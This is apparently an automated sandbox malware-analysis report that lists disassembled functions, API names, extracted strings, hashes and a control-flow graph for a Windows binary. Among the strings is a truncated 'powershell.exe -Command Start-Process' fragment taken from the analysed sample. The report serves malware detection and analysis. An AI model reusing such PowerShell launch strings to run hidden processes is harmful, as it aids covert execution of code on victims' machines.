                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                  • String ID: csm$csm
                                                                                  • API String ID: 3896166516-3733052814
                                                                                  • Opcode ID: ced92a26e68f8faf10be867b2926ed9b68afcc563360ef92477b975877ea4a75
                                                                                  • Instruction ID: bfb06211a89f940adf5bb6379dbc8d337c6d63468b3f4bc1331702f6facc695f
                                                                                  • Opcode Fuzzy Hash: ced92a26e68f8faf10be867b2926ed9b68afcc563360ef92477b975877ea4a75
                                                                                  • Instruction Fuzzy Hash: AD51E17A9293439EFF24AF119446368B7A0EB54B84F94417ADB5C87B85CF3CE450DB10
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallEncodePointerTranslator
                                                                                  • String ID: MOC$RCC
                                                                                  • API String ID: 3544855599-2084237596
                                                                                  • Opcode ID: 0c9c0748ab2ccf05807d721b40c3b6d99c38ab84ebc95d48332250c1543fc0c9
                                                                                  • Instruction ID: ff4b804a1ca9440c6a3e92969b8fe5dd40a069b1967c8c9b0d73e6cf2ebd9b84
                                                                                  • Opcode Fuzzy Hash: 0c9c0748ab2ccf05807d721b40c3b6d99c38ab84ebc95d48332250c1543fc0c9
                                                                                  • Instruction Fuzzy Hash: 2061E476919BC695EB60AF15E4413AAF7A0FB84B84F444279EB8C03B59DF3CE094CB10
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                  • String ID: bad locale name
                                                                                  • API String ID: 2775327233-1405518554
                                                                                  • Opcode ID: 1deee40651b4476868030aafa90c3e28cad5691699546a4096424e5a976d4dbe
                                                                                  • Instruction ID: e3e848bdba9d39a060f1da89c2bd5d48f0857ad4be8c9676c08f5dfa3e04cb99
                                                                                  • Opcode Fuzzy Hash: 1deee40651b4476868030aafa90c3e28cad5691699546a4096424e5a976d4dbe
                                                                                  • Instruction Fuzzy Hash: 67417F2AB5B682E9FF10EF70D4922ACA364AF44748F440479EE4E27A59CF3CD515E324
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastWrite
                                                                                  • String ID: U$|~fqVG
                                                                                  • API String ID: 442123175-186519428
                                                                                  • Opcode ID: 42c920046dc7a2b1a26b748f4d44017816129ea4c39c0289737a4b3c3130d930
                                                                                  • Instruction ID: e86343e4d5157cceb1f0fbfd4c385a6a0ac66fdb217ac42306c1232a75bf0d90
                                                                                  • Opcode Fuzzy Hash: 42c920046dc7a2b1a26b748f4d44017816129ea4c39c0289737a4b3c3130d930
                                                                                  • Instruction Fuzzy Hash: 8941E376B18A81D2EB20EF29E4463A9E760FB98784F914031EE4D87788DF3CD401E751
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: FeaturePresentProcessor__raise_securityfailurecapture_previous_context
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 838830666-3303519982
                                                                                  • Opcode ID: 8f39b5177f6e80c2221c5f36804a185fc02c589c5f1ea84ef111a43d1bcd6447
                                                                                  • Instruction ID: b8872bd7cc87619e5c899dc32405f9cde722881725bc102cade366a9a6e6c210
                                                                                  • Opcode Fuzzy Hash: 8f39b5177f6e80c2221c5f36804a185fc02c589c5f1ea84ef111a43d1bcd6447
                                                                                  • Instruction Fuzzy Hash: DC210838A19B46A1FB40AB18F953364A6B4FB95344FD111BAD98E823A1DF3CE415E320
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: GetTempPath2W$kernel32.dll
                                                                                  • API String ID: 1646373207-1846531799
                                                                                  • Opcode ID: 6c157fc2c9eb0bafc852afba0f6158d2a57fd74ca7526d9592526048dfbc2ed9
                                                                                  • Instruction ID: 26418f40d8cc25dbabd78821e204894f7a5da3deacef23bc20a4b32f7c333fc2
                                                                                  • Opcode Fuzzy Hash: 6c157fc2c9eb0bafc852afba0f6158d2a57fd74ca7526d9592526048dfbc2ed9
                                                                                  • Instruction Fuzzy Hash: 8AE09BE5B04A06A1FE04AB19F985034A321FF58F84BE64075C61D47324DF3CD4489310
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharErrorLastMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 203985260-0
                                                                                  • Opcode ID: b21d51b5a1aba21564247d1ac1f2f6c5ee14a898047ebc4b39465d7037f73d6f
                                                                                  • Instruction ID: 698e9a7021304c9abdcc206c5cc49617b94460116d8eb748f44b63cb8747de73
                                                                                  • Opcode Fuzzy Hash: b21d51b5a1aba21564247d1ac1f2f6c5ee14a898047ebc4b39465d7037f73d6f
                                                                                  • Instruction Fuzzy Hash: 1D2147BAA28B8286F7609F16A40432EBBB4F799B90F640178DB8853B54CF3CD4019B14
                                                                                  APIs
                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF73A40A8CC
                                                                                    • Part of subcall function 00007FF73A3FF778: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF73A3FF727,?,?,?,?,?,00007FF73A3FF612), ref: 00007FF73A3FF781
                                                                                    • Part of subcall function 00007FF73A3FF778: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF73A3FF727,?,?,?,?,?,00007FF73A3FF612), ref: 00007FF73A3FF7A6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                  • String ID: *?$|~fqVG
                                                                                  • API String ID: 4036615347-3823916928
                                                                                  • Opcode ID: e317457474b60fced0dcf58a211e7257d8554f8782003dca67dc30602de006f2
                                                                                  • Instruction ID: 445651a19fa054abb4c8c91c5ab2299e68e85ecc3634d096f96203b0d599ab2b
                                                                                  • Opcode Fuzzy Hash: e317457474b60fced0dcf58a211e7257d8554f8782003dca67dc30602de006f2
                                                                                  • Instruction Fuzzy Hash: F051186AF0865261FF10FA6989022BCE791AF44BE4F864571DE0C17BC5DE7CE445B322
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: __except_validate_context_record
                                                                                  • String ID: csm$csm
                                                                                  • API String ID: 1467352782-3733052814
                                                                                  • Opcode ID: ae2a62215a58026a0886f6dcf9f8c2e93cb3e5654c84a92589a235d849fb530a
                                                                                  • Instruction ID: 03f3d5154c10e3820b1b2597844cb66582c2c4e7351ff38b5862313e1b1c8def
                                                                                  • Opcode Fuzzy Hash: ae2a62215a58026a0886f6dcf9f8c2e93cb3e5654c84a92589a235d849fb530a
                                                                                  • Instruction Fuzzy Hash: 7271F33A91A68396FF20AF25E4496B9FBA0FB04B84F948179DE4C47685CF3CD491D710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFrameInfo__except_validate_context_record
                                                                                  • String ID: csm
                                                                                  • API String ID: 2558813199-1018135373
                                                                                  • Opcode ID: 07cf4bfd112d551ea8757e3c0906a061ffaf6e6ee70d054fe60862b4d3bcdff6
                                                                                  • Instruction ID: 16dcfb0cb853995f9704137aeb654b60f62f5e20020f7a07a187238c32a10962
                                                                                  • Opcode Fuzzy Hash: 07cf4bfd112d551ea8757e3c0906a061ffaf6e6ee70d054fe60862b4d3bcdff6
                                                                                  • Instruction Fuzzy Hash: 4C51943AA2A78296EE60EF15E04126DB7A4F788B90F500179DF8D07B56CF3DE091DB10
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                  • String ID: powershell.exe -Command "Start-Process '
                                                                                  • API String ID: 73155330-2541463610
                                                                                  • Opcode ID: a5299bd422f5f1b3716e720325969913c96f5c5db3bfe6c2e7d02a0ae3824b60
                                                                                  • Instruction ID: 33c58c523a3db65d0f4f562ace6193a021dbafc5b66a689e823c96750e024711
                                                                                  • Opcode Fuzzy Hash: a5299bd422f5f1b3716e720325969913c96f5c5db3bfe6c2e7d02a0ae3824b60
                                                                                  • Instruction Fuzzy Hash: 20410329B29A83A1FE10AB16D1062B8E392AB44BE0FD40739CA6D07BD5DF3CE0459310
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastWrite
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 442123175-3303519982
                                                                                  • Opcode ID: f25231167171d47a22d98216323ecf5abc3b8e7603e18d8075592a42be890438
                                                                                  • Instruction ID: d2c00cb99d286d6f04c241f762b708e89d34c395fc7558ee7a6e5fcc851aeecd
                                                                                  • Opcode Fuzzy Hash: f25231167171d47a22d98216323ecf5abc3b8e7603e18d8075592a42be890438
                                                                                  • Instruction Fuzzy Hash: 273124B6B18A41A6EB10EF19E4452A9F3A0FB58780F868432EF4D83754DF3CD551EB11
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastWrite
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 442123175-3303519982
                                                                                  • Opcode ID: 7f7ef8b8a0101605542e277cdf2f4420d232ace2cd414a122261941e7e2c3063
                                                                                  • Instruction ID: 1aab99e4a6802e82a4a33b082212641042c01e0ac4c18b618cd7e4c0c73ec159
                                                                                  • Opcode Fuzzy Hash: 7f7ef8b8a0101605542e277cdf2f4420d232ace2cd414a122261941e7e2c3063
                                                                                  • Instruction Fuzzy Hash: 62310576A18A81A6EB10EF29E4412A8F761FB58780F858072DB4E83718DF3CD511EB12
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastModuleName
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 2776309574-3303519982
                                                                                  • Opcode ID: de0e64f43b465e6125156f975df279208e46a0d371bd7b19554ee6903d073bea
                                                                                  • Instruction ID: 6c1d4522ce72bdf8d39494957af16ffa65827188fd820bc62f25983a8ca0058e
                                                                                  • Opcode Fuzzy Hash: de0e64f43b465e6125156f975df279208e46a0d371bd7b19554ee6903d073bea
                                                                                  • Instruction Fuzzy Hash: AF31D236618B819AF720EB29E4013ADE7A0F785798F954175DADC43A98CF3CD141EB11
                                                                                  APIs
                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF73A3F11AF), ref: 00007FF73A3F9DD0
                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF73A3F11AF), ref: 00007FF73A3F9E11
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                  • String ID: csm
                                                                                  • API String ID: 2573137834-1018135373
                                                                                  • Opcode ID: 63a332ca40023c25e9a5d99e6c2caf2710dfa93a35880377e7f0d51da030b8ab
                                                                                  • Instruction ID: 02f81af514998deae22705b797deddb65eb2c6f59adcf78eefe54e0d8269e28e
                                                                                  • Opcode Fuzzy Hash: 63a332ca40023c25e9a5d99e6c2caf2710dfa93a35880377e7f0d51da030b8ab
                                                                                  • Instruction Fuzzy Hash: 42116036619B4292EB609F19F440259BBE4FB98B84FA94274EE8C07758DF3CC551C700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: Xinvalid_argument__std_exception_copystd::_
                                                                                  • String ID: string too long
                                                                                  • API String ID: 2536225881-2556327735
                                                                                  • Opcode ID: 7013e128e2125b895d9d66df5116de0737d9dc45951b57089b93d1b7acbd90a4
                                                                                  • Instruction ID: 3406c7cdf5d0db5dddcf36d1eba114db7a64d98fd58f84c4adec4d60a31da2f1
                                                                                  • Opcode Fuzzy Hash: 7013e128e2125b895d9d66df5116de0737d9dc45951b57089b93d1b7acbd90a4
                                                                                  • Instruction Fuzzy Hash: FAE0EDA5A14B05A0FF01AF21E8820A8A320AF28700BD58171DA1C02351EE3CE1E5C310
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3953959245.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ff848e90000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3dd856ec6629a9ad3253283359d6c2a881ec7a1311ff8ffeb1e483423fcff176
                                                                                  • Instruction ID: 29c1cfa6bac51b81d075f13f06edf054ad2643bd55ff8ec3c5d015a1cc12a693
                                                                                  • Opcode Fuzzy Hash: 3dd856ec6629a9ad3253283359d6c2a881ec7a1311ff8ffeb1e483423fcff176
                                                                                  • Instruction Fuzzy Hash: 6C01677115CB0D4FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661DB36E882CB45

                                                                                  Execution Graph

                                                                                  Execution Coverage:2.6%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:3
                                                                                  Total number of Limit Nodes:0
                                                                                  execution_graph 8767 7ff848e6d324 8768 7ff848e6d32d LoadLibraryExW 8767->8768 8770 7ff848e6d3dd 8768->8770

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 189 7ff848f33b9e-7ff848f33c91 205 7ff848f33c93-7ff848f33c9d 189->205 206 7ff848f33ca1 189->206 207 7ff848f33c9f-7ff848f33cd2 205->207 208 7ff848f33cdc-7ff848f33cef 205->208 210 7ff848f33ca6-7ff848f33cad 206->210 207->208 219 7ff848f33cd4-7ff848f33cda 207->219 211 7ff848f33d08-7ff848f33d5b 208->211 212 7ff848f33cf1-7ff848f33d06 208->212 215 7ff848f3405f-7ff848f340d6 210->215 211->206 229 7ff848f33d61-7ff848f33d6b 211->229 212->211 215->206 230 7ff848f340dc-7ff848f340e9 215->230 219->208 231 7ff848f33d6d-7ff848f33d7a 229->231 232 7ff848f33d84-7ff848f33deb 229->232 233 7ff848f340eb-7ff848f340fe 230->233 234 7ff848f34105-7ff848f34123 230->234 231->232 240 7ff848f33d7c-7ff848f33d82 231->240 232->206 255 7ff848f33df1-7ff848f33dfb 232->255 233->234 234->206 239 7ff848f34129-7ff848f34133 234->239 241 7ff848f3415d-7ff848f34169 239->241 242 7ff848f34135-7ff848f34141 239->242 240->232 241->206 246 7ff848f3416f-7ff848f34179 241->246 242->241 247 7ff848f3417f-7ff848f3418e 246->247 248 7ff848f33cb2-7ff848f342ad 246->248 248->206 295 7ff848f342b3-7ff848f342bd 248->295 257 7ff848f33dfd-7ff848f33e0a 255->257 258 7ff848f33e14-7ff848f33e27 255->258 257->258 266 7ff848f33e0c-7ff848f33e12 257->266 259 7ff848f33e29-7ff848f33e3e 258->259 260 7ff848f33e40-7ff848f33e96 258->260 259->260 260->206 278 7ff848f33e9c-7ff848f33ea6 260->278 266->258 279 7ff848f33ea8-7ff848f33eb5 278->279 280 7ff848f33ebf-7ff848f33f29 278->280 279->280 284 7ff848f33eb7-7ff848f33ebd 279->284 280->206 294 7ff848f33f2f-7ff848f33f39 280->294 284->280 296 7ff848f33f3b-7ff848f33f56 294->296 297 7ff848f33f58-7ff848f33f5f 294->297 300 7ff848f342bf-7ff848f342da 295->300 301 7ff848f342dc-7ff848f34343 295->301 296->297 297->206 299 7ff848f33f65-7ff848f33f72 297->299 304 7ff848f33f92-7ff848f33f9e 299->304 305 7ff848f33f74-7ff848f33f90 299->305 300->301 301->206 325 7ff848f34349-7ff848f34353 301->325 304->206 309 7ff848f33fa4-7ff848f33fb1 304->309 305->304 311 7ff848f33fcd-7ff848f33fe6 309->311 312 7ff848f33fb3-7ff848f33fc6 309->312 311->206 316 7ff848f33fec-7ff848f33ff6 311->316 312->311 317 7ff848f33ff8-7ff848f34004 316->317 318 7ff848f34020-7ff848f34025 316->318 317->318 318->206 320 7ff848f3402b-7ff848f34035 318->320 320->210 322 7ff848f3403b-7ff848f34047 320->322 322->215 326 7ff848f34372-7ff848f34385 325->326 327 7ff848f34355-7ff848f34370 325->327 328 7ff848f34387-7ff848f343a2 326->328 329 7ff848f343a4-7ff848f34434 326->329 327->326 328->329 329->206 343 7ff848f3443a-7ff848f34445 329->343 344 7ff848f34447-7ff848f3446a 343->344 345 7ff848f34474-7ff848f34512 call 7ff848f34e78 344->345 359 7ff848f34527-7ff848f34553 call 7ff848f35b6d 345->359 362 7ff848f34598-7ff848f345a4 359->362 363 7ff848f34555-7ff848f34590 359->363 364 7ff848f345aa-7ff848f345b7 362->364 365 7ff848f34522 362->365 363->362 368 7ff848f345b9-7ff848f345d4 364->368 369 7ff848f345d6-7ff848f345e6 364->369 365->359 368->369 369->365 371 7ff848f345ec-7ff848f345f9 369->371 373 7ff848f345fb-7ff848f34616 371->373 374 7ff848f34618-7ff848f34624 371->374 373->374 374->365 375 7ff848f3462a-7ff848f34637 374->375 378 7ff848f34639-7ff848f34654 375->378 379 7ff848f34656-7ff848f346de 375->379 378->379 379->365 392 7ff848f346e4-7ff848f346f1 379->392 393 7ff848f346f3-7ff848f3470e 392->393 394 7ff848f34710-7ff848f34723 392->394 393->394 396 7ff848f34742-7ff848f34795 394->396 397 7ff848f34725-7ff848f34740 394->397 396->365 406 7ff848f3479b-7ff848f347a8 396->406 397->396 407 